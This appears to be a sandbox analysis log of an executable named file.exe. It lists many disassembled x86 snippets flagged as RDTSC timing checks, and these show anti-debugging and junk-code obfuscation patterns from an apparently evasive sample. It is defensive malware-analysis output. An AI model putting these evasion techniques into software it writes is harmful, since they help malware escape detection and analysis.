                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E0C second address: 1074E13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F62 second address: 1075FE4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bx, E0A7h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 xor di, A038h 0x00000019 jmp 00007FB0D4776371h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 cmc 0x00000026 mov eax, dword ptr [ebp+122D083Dh] 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FB0D4776368h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FB0D4776368h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 0000001Ah 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E13 second address: 1074EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FB0D54BC068h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2B6Ah] 0x0000002a jnp 00007FB0D54BC06Ch 0x00000030 mov di, bx 0x00000033 push dword ptr fs:[00000000h] 0x0000003a or dword ptr [ebp+124575AFh], eax 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bh, 8Fh 0x00000049 mov eax, dword ptr [ebp+122D156Dh] 0x0000004f mov edi, esi 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007FB0D54BC068h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d jo 00007FB0D54BC066h 0x00000073 push eax 0x00000074 pushad 0x00000075 jc 00007FB0D54BC072h 0x0000007b jmp 00007FB0D54BC06Ch 0x00000080 push eax 0x00000081 push edx 0x00000082 jne 00007FB0D54BC066h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075FE4 second address: 1075FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101D814 second address: 101D824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB0D54BC066h 0x0000000a jnc 00007FB0D54BC066h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A432 second address: 107A43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079592 second address: 10795C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FB0D54BC079h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A43C second address: 107A44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A44A second address: 107A44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10795C0 second address: 107964C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776372h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b add dword ptr [ebp+122D2673h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jno 00007FB0D4776367h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov edi, dword ptr [ebp+1248424Ch] 0x0000002b mov eax, dword ptr [ebp+122D1529h] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FB0D4776368h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b jg 00007FB0D4776374h 0x00000051 push FFFFFFFFh 0x00000053 mov bh, 49h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FB0D477636Eh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A44E second address: 107A45B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107964C second address: 1079656 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D477636Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A45B second address: 107A461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A461 second address: 107A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jg 00007FB0D4776367h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FB0D4776368h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movzx edi, cx 0x0000002c push 00000000h 0x0000002e mov edi, esi 0x00000030 pushad 0x00000031 movzx edi, cx 0x00000034 mov dword ptr [ebp+122D1B75h], edx 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e js 00007FB0D4776368h 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B497 second address: 107B49B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107A5FA second address: 107A66F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, DE8Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FB0D4776368h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 stc 0x00000038 mov eax, dword ptr [ebp+122D001Dh] 0x0000003e or ebx, dword ptr [ebp+1246E7EBh] 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FB0D4776368h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 jnc 00007FB0D4776367h 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B49B second address: 107B4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107A66F second address: 107A673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B4A5 second address: 107B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107A673 second address: 107A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B4A9 second address: 107B547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edi, dword ptr [ebp+122D2CA6h] 0x00000010 js 00007FB0D54BC072h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FB0D54BC068h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov ebx, ecx 0x00000036 mov dword ptr [ebp+122D18D0h], eax 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e jno 00007FB0D54BC07Ah 0x00000044 pushad 0x00000045 jmp 00007FB0D54BC070h 0x0000004a jmp 00007FB0D54BC079h 0x0000004f popad 0x00000050 popad 0x00000051 push eax 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B6DE second address: 107B6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B6E2 second address: 107B6EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107B6EC second address: 107B6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 108062C second address: 1080644 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB0D54BC066h 0x00000008 jmp 00007FB0D54BC06Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1080644 second address: 108064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB0D4776366h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 108064E second address: 1080657 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1025FD6 second address: 1025FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4776376h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1025FF0 second address: 1025FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1083330 second address: 108333A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 108333A second address: 108338A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB0D54BC066h 0x00000009 jmp 00007FB0D54BC073h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FB0D54BC074h 0x0000001a jmp 00007FB0D54BC078h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 108545F second address: 1085477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776370h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10824AD second address: 1082555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D54BC06Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FB0D54BC068h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov di, cx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FB0D54BC068h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2CC6h] 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b jmp 00007FB0D54BC077h 0x00000060 add bh, 0000000Ch 0x00000063 mov eax, dword ptr [ebp+122D0DE9h] 0x00000069 jnl 00007FB0D54BC06Ah 0x0000006f mov bx, 29A4h 0x00000073 cmc 0x00000074 push FFFFFFFFh 0x00000076 mov di, FF92h 0x0000007a nop 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1083512 second address: 108351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 107E6C5 second address: 107E6CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1084559 second address: 108455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1086468 second address: 10864EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB0D54BC079h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB0D54BC068h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f jo 00007FB0D54BC06Ch 0x00000035 mov dword ptr [ebp+122D3073h], edx 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D1C8Ah] 0x00000043 xchg eax, esi 0x00000044 push edi 0x00000045 jmp 00007FB0D54BC077h 0x0000004a pop edi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e je 00007FB0D54BC068h 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10856C7 second address: 10856CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10856CC second address: 10856DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10856DB second address: 10856DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 108668F second address: 1086693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1086693 second address: 10866A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FB0D4776366h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10875BB second address: 10875BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1088594 second address: 1088598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1088598 second address: 10885B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB0D54BC071h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10885B6 second address: 10885BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1088784 second address: 108878E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB0D54BC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1091DE2 second address: 1091DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776370h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1095964 second address: 109596B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109596B second address: 1095970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E0C second address: 1098E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jbe 00007FB0D54BC066h 0x0000000f pop ecx 0x00000010 jmp 00007FB0D54BC06Dh 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E36 second address: 1098E4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB0D4776368h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FB0D4776366h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E4D second address: 1098E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E51 second address: 1098E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E5C second address: 1098E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 1098E6B second address: 1098E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109A53A second address: 109A560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB0D54BC079h 0x0000000c js 00007FB0D54BC066h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109A560 second address: 109A56A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109A56A second address: 109A56F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BBE7 second address: 109BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BBEC second address: 109BBF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BBF2 second address: 109BBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BBF6 second address: 109BC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BC02 second address: 109BC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 109BC08 second address: 109BC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A12D0 second address: 10A12E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776374h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A1D14 second address: 10A1D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A1E4E second address: 10A1E65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0D4776366h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jno 00007FB0D4776366h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A1FDD second address: 10A1FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A1FE3 second address: 10A1FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A2432 second address: 10A2438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10AA296 second address: 10AA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10AA29C second address: 10AA2A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10AA2A2 second address: 10AA2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A94E1 second address: 10A94EB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A94EB second address: 10A94F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe, RDTSC instruction interceptor: First address: 10A94F0 second address: 10A94F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
